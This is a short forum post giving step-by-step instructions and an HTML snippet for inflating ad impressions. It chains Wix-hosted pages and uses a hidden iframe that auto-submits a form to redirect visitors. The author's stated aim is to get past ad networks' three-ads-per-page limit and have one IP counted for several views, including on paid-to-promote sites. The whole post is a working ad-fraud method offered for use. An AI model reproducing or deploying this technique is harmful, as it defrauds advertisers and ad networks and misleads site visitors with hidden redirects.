1
hello to all
today , all cpm sites allow members to put max 3 ads per page
but don't worry you can put up to 8 ads ( i tried this method with adhexa and it counts 5-7 views from 1 ip ):
lets start
- sinup to wix.com
- create new empty site then click edit template
- click add > apps > html > set mode at html
- then put 3 ads
- do same thing if you need to add more ads
- if you want to display your website
- set mode at weblink and put yours
this method will work with ptp sites just by creating new wix blog and adding this code
i hope this will help you to iscrease your income<html>
<body>
<script>
function go(){
window.frames[0].document.body.innerHTML='<form target="_parent" action="your 1st wixblog"></form>';
window.frames[0].document.forms[0].submit()
}
</script>
<iframe onload="window.setTimeout('go()', 99)" src="about:blank" style="visibility:hidden"></iframe>
</body>
</html>
Bookmarks